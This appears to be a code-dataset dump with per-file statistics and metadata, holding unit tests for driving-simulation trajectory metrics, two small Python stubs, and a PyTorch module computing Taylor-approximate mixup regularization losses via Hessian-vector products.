        metric = metrics.DistanceToRefTrajectoryMetric()
        result = metric.compute(sim_output)
        self.assertEqual(result.sum(), 0.)

    def test_different_fraction(self) -> None:
        # an explicit scene fraction controls how many steps are evaluated
        simulated_steps = 20
        scene_fraction = 0.5
        attrs = {
            "simulated_ego_states": torch.ones(simulated_steps, 7),
            "recorded_ego_states": torch.ones(simulated_steps, 7),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DistanceToRefTrajectoryMetric(scene_fraction)
        result = metric.compute(sim_output)
        simulated_steps_fraction = int(simulated_steps * scene_fraction)
        self.assertEqual(len(result), simulated_steps_fraction)
        self.assertEqual(result.sum(), 0.)

    def test_symmetry(self) -> None:
        # swapping simulated and recorded trajectories keeps the total distance
        attrs = {
            "simulated_ego_states": torch.ones(20, 7),
            "recorded_ego_states": torch.full((20, 7), 2.0),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DistanceToRefTrajectoryMetric()
        result = metric.compute(sim_output)
        attrs = {
            "simulated_ego_states": torch.full((20, 7), 2.0),
            "recorded_ego_states": torch.ones(20, 7),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DistanceToRefTrajectoryMetric()
        result_switch = metric.compute(sim_output)
        self.assertEqual(result.sum(), result_switch.sum())

    def test_parallel_trajectory(self) -> None:
        # constant unit offset -> same distance everywhere; 1.4142 ~ sqrt(2)
        simulated_steps = 20
        attrs = {
            "simulated_ego_states": torch.ones(simulated_steps, 7),
            "recorded_ego_states": torch.full((20, 7), 2.0),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DistanceToRefTrajectoryMetric()
        result = metric.compute(sim_output)
        # Default fraction should be 80% of the samples
        simulated_steps_fraction = int(simulated_steps * 0.8)
        self.assertEqual(len(result), simulated_steps_fraction)
        self.assertEqual(len(torch.unique(result)), 1)
        self.assertAlmostEqual(torch.unique(result).item(), 1.4142, 4)

    def test_larger_observed_ego(self) -> None:
        # a longer recorded trajectory is fine; only the fraction is evaluated
        simulated_steps = 20
        attrs = {
            "simulated_ego_states": torch.ones(simulated_steps, 7),
            "recorded_ego_states": torch.ones(50, 7),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DistanceToRefTrajectoryMetric()
        result = metric.compute(sim_output)
        self.assertEqual(result.sum(), 0.)
        # Default fraction should be 80% of the samples
        simulated_steps_fraction = int(simulated_steps * 0.8)
        self.assertEqual(len(result), simulated_steps_fraction)

    def test_larger_simulated_ego(self) -> None:
        # more simulated than recorded timesteps must raise ValueError
        attrs = {
            "simulated_ego_states": torch.ones(50, 7),
            "recorded_ego_states": torch.ones(20, 7),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DistanceToRefTrajectoryMetric()
        with self.assertRaisesRegex(ValueError, "More simulated timesteps than observed"):
            _ = metric.compute(sim_output)

    def test_half_trajectories(self) -> None:
        # distance-to-trajectory stays constant even when the reference jumps
        # halfway (contrast with the displacement metric's two values)
        observed_trajectory = torch.ones(40, 7)
        observed_trajectory[20:, :] += 1.0
        attrs = {
            "simulated_ego_states": torch.ones(40, 7),
            "recorded_ego_states": observed_trajectory,
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DistanceToRefTrajectoryMetric()
        result = metric.compute(sim_output)
        self.assertEqual(len(torch.unique(result)), 1)

    def test_more_simulation_than_observation(self) -> None:
        # more simulated than recorded timesteps must raise ValueError
        timesteps = 20
        attrs = {
            "simulated_ego_states": torch.ones(timesteps + 20, 7),
            "recorded_ego_states": torch.ones(timesteps, 7),
        }
        sim_output = mock.Mock(**attrs)
        metric = metrics.DistanceToRefTrajectoryMetric()
        with self.assertRaisesRegex(ValueError, "More simulated timesteps than observed"):
            _ = metric.compute(sim_output)
class TestSimulatedDrivenMilesMetric(unittest.TestCase):
    """Tests for metrics.SimulatedDrivenMilesMetric (per-frame miles driven)."""

    def test_no_movement_trajectory(self) -> None:
        n_frames = 20
        sim_output = mock.Mock(simulated_ego_states=torch.ones(n_frames, 7))
        result = metrics.SimulatedDrivenMilesMetric().compute(sim_output)
        self.assertEqual(result.size(0), n_frames)
        self.assertEqual(result.sum().item(), 0.0)

    def test_one_axis_movement_trajectory(self) -> None:
        n_frames = 20
        # keep one coordinate fixed, advance the other one meter per frame
        states = torch.ones(n_frames, 7)
        states[..., 1] += torch.tensor([i for i in range(n_frames)])
        sim_output = mock.Mock(simulated_ego_states=states)
        result = metrics.SimulatedDrivenMilesMetric().compute(sim_output)
        self.assertEqual(result.size(0), n_frames)
        # one meter per frame, converted to miles
        per_frame_miles = 1.0 * metrics.SimulatedDrivenMilesMetric.METER_TO_MILES
        self.assertAlmostEqual(result.sum().item(),
                               per_frame_miles * (n_frames - 1), places=3)
        # the first frame contributes zero; every later frame the same step
        self.assertEqual(len(result.unique()), 2)
class TestReplayDrivenMilesMetric(unittest.TestCase):
    """Tests for metrics.ReplayDrivenMilesMetric (per-frame miles driven in
    the recorded log)."""

    def test_no_movement_trajectory(self) -> None:
        n_frames = 20
        sim_output = mock.Mock(recorded_ego_states=torch.ones(n_frames, 7))
        result = metrics.ReplayDrivenMilesMetric().compute(sim_output)
        self.assertEqual(result.size(0), n_frames)
        self.assertEqual(result.sum().item(), 0.0)

    def test_one_axis_movement_trajectory(self) -> None:
        n_frames = 20
        # keep one coordinate fixed, advance the other one meter per frame
        states = torch.ones(n_frames, 7)
        states[:, 0] += torch.arange(0, n_frames)
        sim_output = mock.Mock(recorded_ego_states=states)
        result = metrics.ReplayDrivenMilesMetric().compute(sim_output)
        self.assertEqual(result.size(0), n_frames)
        # one meter per frame, converted to miles
        per_frame_miles = 1.0 * metrics.ReplayDrivenMilesMetric.METER_TO_MILES
        self.assertAlmostEqual(result.sum().item(),
                               per_frame_miles * (n_frames - 1), places=3)
        # the first frame contributes zero; every later frame the same step
        self.assertEqual(len(result.unique()), 2)
| 40.069307
| 90
| 0.643028
| 1,334
| 12,141
| 5.633433
| 0.126687
| 0.049102
| 0.06334
| 0.064671
| 0.804258
| 0.792415
| 0.763673
| 0.747705
| 0.735196
| 0.71843
| 0
| 0.022185
| 0.253768
| 12,141
| 302
| 91
| 40.201987
| 0.807285
| 0.049831
| 0
| 0.681452
| 0
| 0
| 0.074646
| 0
| 0
| 0
| 0
| 0
| 0.133065
| 1
| 0.08871
| false
| 0
| 0.028226
| 0
| 0.145161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e19ed1e597ccf9fb9ecd8684156fb9cb06c3c44f
| 61
|
py
|
Python
|
cmstack/hdfg/onnx_hdfg/onnx_helper.py
|
he-actlab/cdstack
|
38f605cfa299bf97b5875a19f9fd811a2671d56f
|
[
"Apache-2.0"
] | null | null | null |
cmstack/hdfg/onnx_hdfg/onnx_helper.py
|
he-actlab/cdstack
|
38f605cfa299bf97b5875a19f9fd811a2671d56f
|
[
"Apache-2.0"
] | null | null | null |
cmstack/hdfg/onnx_hdfg/onnx_helper.py
|
he-actlab/cdstack
|
38f605cfa299bf97b5875a19f9fd811a2671d56f
|
[
"Apache-2.0"
] | null | null | null |
def make_node():
    """Placeholder for building an ONNX node; intentionally a no-op for now."""
    return None
def make_value_info():
    """Placeholder for building an ONNX value-info entry; no-op for now."""
    return None
| 7.625
| 22
| 0.622951
| 9
| 61
| 3.888889
| 0.666667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.278689
| 61
| 7
| 23
| 8.714286
| 0.795455
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
e1c709f3215825c5bc643e91bf9c3b18c8a64137
| 38
|
py
|
Python
|
test/unit/core/sample_plugins/__init__.py
|
modora/fold
|
c2eded4480cf715794b8f0585df7dba2cc1348f3
|
[
"MIT"
] | null | null | null |
test/unit/core/sample_plugins/__init__.py
|
modora/fold
|
c2eded4480cf715794b8f0585df7dba2cc1348f3
|
[
"MIT"
] | null | null | null |
test/unit/core/sample_plugins/__init__.py
|
modora/fold
|
c2eded4480cf715794b8f0585df7dba2cc1348f3
|
[
"MIT"
] | null | null | null |
from .p1 import P1
from .p2 import P2
| 12.666667
| 18
| 0.736842
| 8
| 38
| 3.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 0.210526
| 38
| 2
| 19
| 19
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
becea6281f75a8789cfdb5c3aa303a671364e681
| 19,875
|
py
|
Python
|
mixup_utils/taylor_losses.py
|
mpsenka21/generalization
|
366c5542787a6e3d51c17daab440fadcb5fb127e
|
[
"MIT"
] | null | null | null |
mixup_utils/taylor_losses.py
|
mpsenka21/generalization
|
366c5542787a6e3d51c17daab440fadcb5fb127e
|
[
"MIT"
] | null | null | null |
mixup_utils/taylor_losses.py
|
mpsenka21/generalization
|
366c5542787a6e3d51c17daab440fadcb5fb127e
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from torch.autograd import Variable
# Module to compute and evaluate the Taylor approximate loss in the paper on larger-scale tasks
# - Standard Taylor, global order 2 (eq. 12)
# - Our Taylor, up to order 2 for each \epsilon and \delta (eq. 4)
# --- Note that for cross entropy loss, this only amounts to adding an
# \epsilon\delta^2 term
# (equation refs are taken from "On Mixup Regularization"):
# https://arxiv.org/pdf/2006.06049.pdf
### some modules for computing the necessary covariances, approximately with SVD as needed ###
# takes images and one-hot target vectors as input and computes the means and covariances of the data that are necessary to compute Taylor-approximate loss
def compute_moments(data, targets):
    """Compute the data moments needed for the Taylor-approximate loss.

    Args:
        data: (num, ...) tensor of inputs; flattened to (num, x_dim).
        targets: (num, num_classes) tensor of one-hot target vectors.

    Returns:
        xbar: (x_dim,) mean of the flattened inputs.
        ybar: (num_classes,) mean of the targets.
        xxcov: (x_dim, x_dim) centered input covariance.
        xycov: (x_dim, num_classes) input/target cross-covariance.
        T: (num_classes, x_dim, x_dim) with T[c] = E_j[y'_j(c) x'_j x'_j^T].
    """
    assert data.shape[0] == targets.shape[0]
    num = data.shape[0]
    num_classes = targets.shape[1]
    x = data.reshape((num, -1))
    y = targets.reshape((num, -1))
    x_dim = x.shape[1]
    xbar = x.mean(axis=0)
    xcent = x - xbar
    ybar = y.mean(axis=0)
    ycent = y - ybar
    xxcov = 1 / num * torch.matmul(torch.transpose(xcent, 0, 1), xcent)
    xycov = 1 / num * torch.matmul(torch.transpose(xcent, 0, 1), ycent)
    # Follow the input's device/dtype instead of hard-coding .cuda():
    # the original crashed on CPU-only machines and silently downcast
    # float64 inputs to float32.
    T = torch.zeros((num_classes, x_dim, x_dim), device=data.device, dtype=x.dtype)
    for i in range(num_classes):
        # xcent is (num by x_dim)
        # T[i,:,:] = E_j(y'_j(c) x'_j x'_j^T)
        T[i, :, :] = (1 / num) * xcent.t() @ (xcent * ycent[:, i].reshape((num, 1)))
    return xbar, ybar, xxcov, xycov, T
def decomposition(cov, n_components):
    """Return a rank-``n_components`` truncated SVD of ``cov``.

    Produces U, S, V such that cov ~ U @ diag(S) @ V.T, keeping only the
    leading ``n_components`` singular triplets.
    """
    left, singular, right = torch.svd(cov)
    k = n_components
    return left[:, :k], singular[:k], right[:, :k]
def cross_entropy_manual(X, Y):
    """Batch cross-entropy between softmax(X) and one-hot labels Y, natural
    log, summed over the batch.

    X: (N, c) raw model outputs (not necessarily a distribution).
    Y: (N, c) one-hot encoded labels.

    Mathematically identical to the original exp/normalize/log formulation,
    but uses log_softmax so large logits no longer overflow exp() into
    inf/nan (bug fix), and the softmax is computed in a single pass.
    Kept as a manual implementation because hvp() needs a plain
    twice-differentiable function of (X, Y).
    """
    return -(Y * torch.log_softmax(X, dim=1)).sum()
# given a pytorch function loss(x_i, y_i) (twice differentiable)
# and a neural network 'model',
# compute matrix-vector products of the form:
# (\nabla_{x1 x2}^2 loss(model(x), y)) @ v
# data_shape is the original shape of the batch tensor (non-flattened
# iamges)
# X is a tensor of size (N, data_dim), where N is the size of the batch,
# and data_dim is the dimension of the input data (flattened)
# Y is a tensor of size (N, c), where c is the number of classes. Each
# row is a Euclidean basis vector corresponding to the true label
# x1 and x2 are strings, either 'x' or 'y'
# --- these indicate which variables to take derivatives w.r.t.
# v is vector to get Hessian's action on
### v should have same dimension as x1, and must be a row vector
# TODO: deal w/ fact that zero hessian returns None object
def hvp(loss, model, data_shape, X, Y, x1, x2, v):
    """Batch-averaged Hessian-vector product of `loss` w.r.t. inputs/labels.

    Computes (1/N) * sum_i (nabla^2_{x1 x2} loss(model(x_i), y_i)) @ v,
    where N is the batch size.

    loss       -- twice-differentiable callable loss(model_output, Y)
    model      -- network applied to X reshaped to `data_shape`
    data_shape -- original (non-flattened) shape of the batch tensor
    X          -- (N, data_dim) flattened inputs
    Y          -- (N, c) rows of Euclidean basis vectors (one-hot labels)
    x1, x2     -- 'x' or 'y': which variables the two derivatives target
    v          -- row vector with the dimensionality of the x1 variable

    Returns a vector with the dimensionality of the x2 variable; a zero
    (unused) mixed Hessian yields an explicit zero tensor.
    """
    vvar = Variable(v, requires_grad=True)
    # extract batch size
    N = X.shape[0]
    Xvar = Variable(X, requires_grad=True)
    Yvar = Variable(Y, requires_grad=True)
    model_eval = model(Xvar.reshape(data_shape))
    # choose which tensors the two differentiations target
    x1var = Xvar if x1 == 'x' else Yvar
    x2var = Xvar if x2 == 'x' else Yvar
    score = loss(model_eval, Yvar)
    # gradient w.r.t. entire batch; keep graph for the second derivative
    grad, = torch.autograd.grad(score, x1var, create_graph=True)
    # contract with v after summing over batch elements (avg. at end)
    total = torch.sum(grad.sum(axis=0) * vvar)
    # BUGFIX: `.grad` is None here (autograd.grad does not populate it) and
    # truthiness of a multi-element tensor raises; test identity explicitly.
    if Xvar.grad is not None:
        Xvar.grad.data.zero_()
    if Yvar.grad is not None:
        Yvar.grad.data.zero_()
    grad2, = torch.autograd.grad(total, x2var, create_graph=True, allow_unused=True)
    # BUGFIX (old TODO): allow_unused=True returns None when the mixed
    # Hessian is identically zero; substitute zeros instead of crashing.
    if grad2 is None:
        grad2 = torch.zeros_like(x2var)
    # sum over rows (different elements in batch) and average
    hvprod = (1/N)*grad2.sum(axis=0)
    return hvprod
# computes quadratics of the form \sum w_i H(x_i, y_i) v_i over a batch, where H is a Hessian
# w.r.t. loss
# suppose the batch size is N
# X is a (N by x_dim) matrix, where x_dim is the dimensionality of the data
# Y is a (N by num_classes) matrix
# x1 is a string: 'x' to take the 1st derivative w.r.t. X, 'y' for 1st derivative
# w.r.t. Y
# x2 is a string: "" "" 2nd derivative w.r.t. X, 'y' for 2st derivative
# w.r.t. Y
# V has the same shape as the variable corresponding to x1
# W has the same shape as the variable corresponding to x2
# see comments over hvp for further details
def hess_quadratic(loss, model, data_shape, X, Y, x1, x2, V, W):
    """Batch-averaged Hessian quadratic: (1/N) * sum_i w_i^T H(x_i, y_i) v_i.

    H is the mixed Hessian nabla^2_{x1 x2} of `loss`. Suppose the batch
    size is N:
    X  -- (N, x_dim) flattened inputs
    Y  -- (N, num_classes) one-hot labels
    x1 -- 'x'/'y': variable of the first derivative
    x2 -- 'x'/'y': variable of the second derivative
    V  -- same shape as the variable corresponding to x1
    W  -- same shape as the variable corresponding to x2
    See comments over hvp for further details. NOTE: the result does not
    support further backprop (create_graph=False on the second derivative).
    """
    Vvar = Variable(V, requires_grad=True)
    Wvar = Variable(W, requires_grad=True)
    # extract batch size
    N = X.shape[0]
    Xvar = Variable(X, requires_grad=True)
    Yvar = Variable(Y, requires_grad=True)
    model_eval = model(Xvar.reshape(data_shape))
    # choose which variable x1var / x2var correspond to
    x1var = Xvar if x1 == 'x' else Yvar
    x2var = Xvar if x2 == 'x' else Yvar
    score = loss(model_eval, Yvar)
    # gradient w.r.t. entire batch; keep graph for the second derivative
    grad, = torch.autograd.grad(score, x1var, create_graph=True)
    # per-element contraction with V (avg. at end)
    total = torch.sum(grad * Vvar)
    # BUGFIX: `.grad` is None here (autograd.grad does not populate it) and
    # truthiness of a multi-element tensor raises; test identity explicitly.
    if Xvar.grad is not None:
        Xvar.grad.data.zero_()
    if Yvar.grad is not None:
        Yvar.grad.data.zero_()
    # NOTE: create_graph=False — bring create_graph=True back to allow backprop
    grad2, = torch.autograd.grad(total, x2var, create_graph=False, allow_unused=True)
    # BUGFIX: allow_unused=True returns None for an identically-zero mixed
    # Hessian; substitute zeros instead of crashing on None.
    if grad2 is None:
        grad2 = torch.zeros_like(x2var)
    # contract with W over all batch rows, then average
    wHv = torch.sum(W * grad2)
    return (1/N)*wHv
# Computes a quadratic of the form w^T \sum_i H(x_i, y_i) v, where H is a Hessian w.r.t. loss
# v, w are vectors that come from an SVD.
#
# v has the same dimension as what x1 corresponds to (x_dim if 'x', num_classes if 'y')
# w has the same dimension as what x2 corresponds to
def hess_svd(loss, model, data_shape, X, Y, x1, x2, v, w):
    """Quadratic form w^T [(1/N) sum_i H(x_i, y_i)] v over a batch.

    H is the mixed Hessian nabla^2_{x1 x2} of `loss`; v, w are vectors
    that come from an SVD:
    v -- same dimension as what x1 corresponds to (x_dim if 'x',
         num_classes if 'y')
    w -- same dimension as what x2 corresponds to
    Remaining arguments are as in hvp. NOTE: the result does not support
    further backprop (create_graph=False on the second derivative).
    """
    vvar = Variable(v, requires_grad=True)
    wvar = Variable(w, requires_grad=True)
    # extract batch size
    N = X.shape[0]
    Xvar = Variable(X, requires_grad=True)
    Yvar = Variable(Y, requires_grad=True)
    model_eval = model(Xvar.reshape(data_shape))
    # choose which variable x1var / x2var correspond to
    x1var = Xvar if x1 == 'x' else Yvar
    x2var = Xvar if x2 == 'x' else Yvar
    score = loss(model_eval, Yvar)
    # gradient w.r.t. entire batch; keep graph for the second derivative
    grad, = torch.autograd.grad(score, x1var, create_graph=True)
    # contract with v after summing over batch elements (avg. at end)
    total = torch.sum(grad.sum(axis=0) * vvar)
    # BUGFIX: `.grad` is None here (autograd.grad does not populate it) and
    # truthiness of a multi-element tensor raises; test identity explicitly.
    if Xvar.grad is not None:
        Xvar.grad.data.zero_()
    if Yvar.grad is not None:
        Yvar.grad.data.zero_()
    # NOTE: create_graph=False — bring create_graph=True back to allow backprop
    grad2, = torch.autograd.grad(total, x2var, create_graph=False, allow_unused=True)
    # BUGFIX: allow_unused=True returns None for an identically-zero mixed
    # Hessian; substitute zeros instead of crashing on None.
    if grad2 is None:
        grad2 = torch.zeros_like(x2var)
    # sum over rows (different elements in batch), contract with w, average
    wHv = torch.sum(grad2.sum(axis=0) * wvar)
    return (1/N)*wHv
# the equivalent Hessian quadratic form for the epsilon delta^2 terms:
# computes \delta^T (1/N) \sum_i \nabla_{x_ix_i}^2(log(S(model(x_i))_{class_val})) \delta
# See project overleaf for details.
# inputs identical to hess_svd, except for class_val
# class_val indicates which corresponding class the current matrix inner product
# is being taken w.r.t.
def hess_svd_ed2(class_val, model, data_shape, X, Y, x1, x2, v, w):
    """Hessian quadratic form for the epsilon-delta^2 terms.

    Computes w^T [(1/N) sum_i nabla^2_{x1 x2} log softmax(model(x_i))_{class_val}] v.
    See project overleaf for details. Inputs are identical to hess_svd,
    except class_val, which indicates the class whose log-probability the
    current matrix inner product is taken w.r.t.
    """
    vvar = Variable(v, requires_grad=True)
    wvar = Variable(w, requires_grad=True)
    # extract batch size
    N = X.shape[0]
    Xvar = Variable(X, requires_grad=True)
    Yvar = Variable(Y, requires_grad=True)
    model_eval = model(Xvar.reshape(data_shape))
    # choose which variable x1var / x2var correspond to
    x1var = Xvar if x1 == 'x' else Yvar
    x2var = Xvar if x2 == 'x' else Yvar
    # BUGFIX: log softmax of the class_val component computed via logsumexp
    # instead of exponentiating raw logits, so large activations no longer
    # overflow exp(); mathematically identical to log(softmax(...)[:, c]).sum()
    f_val = (model_eval[:, class_val] - torch.logsumexp(model_eval, dim=1)).sum()
    # gradient w.r.t. entire batch; keep graph for the second derivative
    grad, = torch.autograd.grad(f_val, x1var, create_graph=True)
    # contract with v after summing over batch elements (avg. at end)
    total = torch.sum(grad.sum(axis=0) * vvar)
    # BUGFIX: `.grad` is None here (autograd.grad does not populate it) and
    # truthiness of a multi-element tensor raises; test identity explicitly.
    if Xvar.grad is not None:
        Xvar.grad.data.zero_()
    if Yvar.grad is not None:
        Yvar.grad.data.zero_()
    # NOTE: create_graph=False — bring create_graph=True back to allow backprop
    grad2, = torch.autograd.grad(total, x2var, create_graph=False, allow_unused=True)
    # BUGFIX: allow_unused=True returns None for an identically-zero mixed
    # Hessian; substitute zeros instead of crashing on None.
    if grad2 is None:
        grad2 = torch.zeros_like(x2var)
    # sum over rows (different elements in batch), contract with w, average
    wHv = torch.sum(grad2.sum(axis=0) * wvar)
    return (1/N)*wHv
# theta_bar is 3/4
# images and labels are not scaled down/flattened
# returns regularization (non-loss) terms
def taylor_loss(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
    """Taylor-series surrogate for the mixup training objective.

    Returns a 4-tuple (loss, ddterm, edterm, eddterm):
      loss    -- cross-entropy at the mean-mixed batch (Xt, Yt)
      ddterm  -- second-order delta-delta (input perturbation) term
      edterm  -- epsilon-delta input/label "cross-term"
      eddterm -- epsilon-delta-delta third-order term (term 4)
    theta_bar is fixed at 3/4. images and labels are not scaled down /
    flattened; mu_img / mu_y are means of inputs and one-hot labels.
    (Uxx, Sxx, Vxx) and (Uxy, Sxy, Vxy) are truncated SVDs of the input
    covariance and input-label cross-covariance; (T_U, T_S, T_V) hold
    per-class SVDs of the third-moment T matrices.
    NOTE(review): assumes CUDA is available (.cuda() on new tensors) and
    that `labels` covers class indices 0..labels.max() -- confirm.
    """
    # extract batch size
    N = images.shape[0]
    # extract number of total pixels for images
    img_size = int(images.numel() / N)
    # extract original batch shape
    batch_shape = images.shape
    # flatten input images
    images_flat = images.reshape((N, img_size))
    mu_img_flat = mu_img.reshape((1, img_size))
    num_classes = labels.max() + 1
    # Y is a stack of rows, where each row is the one_hot version
    # of the correct label
    Y = torch.zeros((N, num_classes)).cuda()
    Y[np.arange(N), labels] = 1
    # COMPUTE raw tilde loss (term 1)
    # we assume uniform distribution, so theta_bar = 3/4
    theta_bar = 0.75*torch.ones((1)).cuda()
    # matrix form for x_theta over whole batch
    Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
    # same for y_tilde
    Yt = (1 - theta_bar)*mu_y + theta_bar*Y
    # torch.save(Xt, 'Xt.pt')
    # torch.save(Yt, 'Yt.pt')
    loss = (1/N)*cross_entropy_manual(model(Xt.reshape(batch_shape)), Yt)
    # COMPUTE delta delta term (term 2)
    # first compute the data-dependent part: per-sample input deviations
    # from the mean, held constant w.r.t. autograd (detach + clone)
    V = (images_flat - mu_img_flat).detach().clone()
    # compute the data dependent component of inner product
    data_dependent = hess_quadratic(
        lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'x', V, V)
    # extract number of singular values extracted from global covariance matrix
    num_components = Sxx.numel()
    # data-independent part: covariance reconstructed one singular triplet
    # at a time through hess_svd
    data_independent = torch.zeros((1)).cuda()
    for i in range(num_components):
        data_independent += hess_svd(
            lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'x', Sxx[i]*Uxx[:,i].reshape((1, img_size)), Vxx[:,i].reshape((1, img_size)))
    # variance of the Uniform mixing weight over an interval of width 1/2
    var_half_mixup = 0.5**2 / 12
    gamma_squared = var_half_mixup + (1 - theta_bar)**2
    ddterm = 0.5*(var_half_mixup*data_dependent + gamma_squared * data_independent)
    # COMPUTE epsilon delta "cross-term" (term 3)
    # first compute the data-dependent part: label deviations from the mean
    W = (Y - mu_y).detach().clone()
    # compute the data dependent component of inner product
    data_dependent_cross = hess_quadratic(
        lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'y', V, W)
    # extract number of singular values extracted from global covariance matrix
    num_components = Sxy.numel()
    data_independent_cross = torch.zeros((1)).cuda()
    for i in range(num_components):
        data_independent_cross += hess_svd(
            lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'y', Sxy[i]*Uxy[:,i].reshape((1, img_size)), Vxy[:,i].reshape((1, num_classes)))
    edterm = var_half_mixup*data_dependent_cross + gamma_squared * data_independent_cross
    # update num components (per-class T matrices may keep a different count)
    num_components = T_S[0,:].numel()
    # COMPUTE epsilon delta delta "3-term" (term 4, new)
    hess_quad_innerprod = torch.zeros((1)).cuda()
    # sum over classes
    for i in range(num_classes):
        # sum over all components we take from T_a matrices
        for j in range(num_components):
            hess_quad_innerprod += hess_svd_ed2(
                i, model, batch_shape, Xt, Xt, 'x', 'x', T_S[i, j]*T_U[i, :, j].reshape((1, img_size)), T_V[i,:,j].reshape((1, img_size)))
    eddterm = -0.5 * ((1-theta_bar)**3) * hess_quad_innerprod
    return loss, ddterm, edterm, eddterm
# returns regularization (non-loss) terms
def taylor_loss_base(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
    """Base (zeroth-order) term of the Taylor-expanded mixup loss.

    Evaluates the cross-entropy of the model at the mean-mixed batch
    (theta_bar = 3/4), averaged over the batch. The SVD arguments
    (Uxx..T_V) are unused here but kept so all taylor_loss_* variants
    share one signature.
    """
    batch_size = images.shape[0]
    # number of pixels per (flattened) image
    pixels = int(images.numel() / batch_size)
    original_shape = images.shape
    flat_images = images.reshape((batch_size, pixels))
    flat_mean = mu_img.reshape((1, pixels))
    n_cls = labels.max() + 1
    # one-hot encode the labels, one row per batch element
    one_hot = torch.zeros((batch_size, n_cls)).cuda()
    one_hot[np.arange(batch_size), labels] = 1
    # mean mixing weight under the assumed uniform distribution
    theta_bar = 0.75*torch.ones((1)).cuda()
    # mean-mixed inputs and labels over the whole batch
    mixed_x = theta_bar*flat_images + (1 - theta_bar)*flat_mean
    mixed_y = theta_bar*one_hot + (1 - theta_bar)*mu_y
    return (1/batch_size)*cross_entropy_manual(model(mixed_x.reshape(original_shape)), mixed_y)
# returns regularization (non-loss) terms
def taylor_loss_d2(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
    """Delta-delta (input second-order) regularization term, reported
    cumulatively at several SVD truncation levels.

    Returns a dict mapping component count k (those of [1, 2, 5, 20, 50,
    200] not exceeding Sxx.numel()) to the regularizer computed with the
    top-k singular triplets of the input covariance. Arguments are as in
    taylor_loss; the Uxy/Sxy/Vxy and T_* inputs are unused here.
    NOTE(review): assumes CUDA is available (.cuda() on new tensors).
    """
    # extract batch size
    N = images.shape[0]
    # extract number of total pixels for images
    img_size = int(images.numel() / N)
    # extract original batch shape
    batch_shape = images.shape
    # flatten input images
    images_flat = images.reshape((N, img_size))
    mu_img_flat = mu_img.reshape((1, img_size))
    num_classes = labels.max() + 1
    # Y is a stack of rows, where each row is the one_hot version
    # of the correct label
    Y = torch.zeros((N, num_classes)).cuda()
    Y[np.arange(N), labels] = 1
    # COMPUTE raw tilde loss (term 1)
    # we assume uniform distribution, so theta_bar = 3/4
    theta_bar = 0.75*torch.ones((1)).cuda()
    # matrix form for x_theta over whole batch
    Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
    # same for y_tilde
    Yt = (1 - theta_bar)*mu_y + theta_bar*Y
    # COMPUTE delta delta term (term 2)
    # first compute the data-dependent part: input deviations from the mean,
    # held constant w.r.t. autograd (detach + clone)
    V = (images_flat - mu_img_flat).detach().clone()
    # compute the data dependent component of inner product
    data_dependent = hess_quadratic(
        lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'x', V, V)
    # extract number of singular values extracted from global covariance matrix
    num_components = Sxx.numel()
    return_dict = {}
    # truncation levels at which a cumulative snapshot is recorded
    num_comps_to_compute = [1, 2, 5, 20, 50, 200]
    # variance of the Uniform mixing weight over an interval of width 1/2
    var_half_mixup = 0.5**2 / 12
    gamma_squared = var_half_mixup + (1 - theta_bar)**2
    data_independent = torch.zeros((1)).cuda()
    for i in range(num_components):
        data_independent += hess_svd(
            lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'x', Sxx[i]*Uxx[:,i].reshape((1, img_size)), Vxx[:,i].reshape((1, img_size)))
        # snapshot the cumulative term after the (i+1)-th component
        if num_comps_to_compute.count(i+1) > 0 : # if i is in comps_to_compute
            return_dict[i+1] = (0.5*(var_half_mixup*data_dependent + gamma_squared * data_independent))
    return return_dict
# returns regularization (non-loss) terms
